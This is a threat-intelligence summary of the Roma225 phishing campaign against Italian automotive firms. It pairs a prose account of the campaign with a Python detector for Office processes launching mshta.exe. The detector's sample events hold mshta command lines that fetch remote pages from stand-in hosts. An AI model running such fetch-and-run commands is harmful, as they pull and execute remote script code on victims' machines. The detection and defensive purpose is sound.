The Enigmatic "Roma225" Campaign
(Dec 27, 2018)
Cybaze-Yoroi ZLab researchers identified a spear-phishing email campaign targeting Italian automotive companies with the intent to infect victims with the "RevengeRAT" Remote Access Trojan (RAT). The campaign has been dubbed "Roma225" because the string "roma225" is used repeatedly throughout the code as a separator between data fields. The phishing email pretended to be from a senior partner of the Brazilian law firm "Veirano Advogados" and carried a Microsoft PowerPoint attachment that, when opened, asked the user to enable macros. If macros are enabled, the macro launches the Windows "mshta.exe" utility, which downloads the next stage of the malware dropper from a fake blog page. The blog page contains hidden VBScript that downloads and installs the RevengeRAT payload. RevengeRAT then contacts its Command and Control (C2) server to relay information about the infected machine to the threat actors. At the time of this writing, it is unclear who is behind the attack or why these specific organizations are being targeted.
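The pivot point in the chain above is an Office application spawning "mshta.exe" to fetch a remote page. The following detection logic is an added example written for this page, not code from Cybaze-Yoroi or the threat report: it scans process-creation events in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine, ProcessId fields are assumed) and flags mshta.exe launched by an Office parent or with a remote URL on its command line. It generalizes beyond PowerPoint to other Office binaries, and the sample events, including the hostnames, are constructed for illustration.

```python
"""Flag mshta.exe launches that match the Roma225 infection chain.

Added example for this page. Assumes Sysmon Event ID 1-style process
creation records supplied as dicts; all sample data below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Office binaries that should not normally spawn script hosts.
# Generalized beyond POWERPNT.EXE, which is the parent in the reported campaign.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    pid: int
    reason: str
    url: Optional[str]


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_event(ev: dict) -> Optional[Finding]:
    """Return a Finding if this event looks like the Office -> mshta.exe pivot."""
    child = basename(ev.get("Image", ""))
    if child != "mshta.exe":
        return None
    parent = basename(ev.get("ParentImage", ""))
    match = URL_RE.search(ev.get("CommandLine", ""))
    url = match.group(0) if match else None
    if parent in OFFICE_PARENTS:
        return Finding(ev["ProcessId"], f"mshta.exe spawned by Office process {parent}", url)
    if url is not None:
        # Even without an Office parent, mshta pulling remote content is suspicious.
        return Finding(ev["ProcessId"], "mshta.exe launched with a remote URL", url)
    return None


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run the check over a stream of process-creation events."""
    return [f for f in (check_process_event(e) for e in events) if f is not None]


# Constructed sample events (hypothetical paths and hostnames, not real IOCs).
SAMPLE_EVENTS = [
    {   # benign: user double-clicked a local .hta from Explorer
        "ProcessId": 1001,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Tools\helper.hta',
    },
    {   # malicious pattern: PowerPoint macro launches mshta against a remote page
        "ProcessId": 1002,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" https://blog.example.com/post',
    },
    {   # suspicious: no Office parent, but mshta fetching remote content
        "ProcessId": 1003,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'mshta http://cdn.example.net/index.html',
    },
    {   # benign: PowerPoint spawning the print helper
        "ProcessId": 1004,
        "Image": r"C:\Windows\splwow64.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
        "CommandLine": r"C:\Windows\splwow64.exe 12288",
    },
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"PID {finding.pid}: {finding.reason} (url={finding.url})")
```

In a real deployment the same rule would be expressed in the SIEM's query language and tuned against known-good mshta.exe usage; the URL check is a secondary signal because the script host can also be invoked with a local file that itself fetches the next stage.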
Recommendation: Files that ask for content to be enabled before the document can be viewed properly are a common sign of a phishing attack. If such a file arrives from a known and trusted sender, contact that individual through a separate channel to verify the attachment before opening it. Any such attachment from an unknown sender should be treated with the utmost scrutiny: do not open it, and report it to the appropriate personnel.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.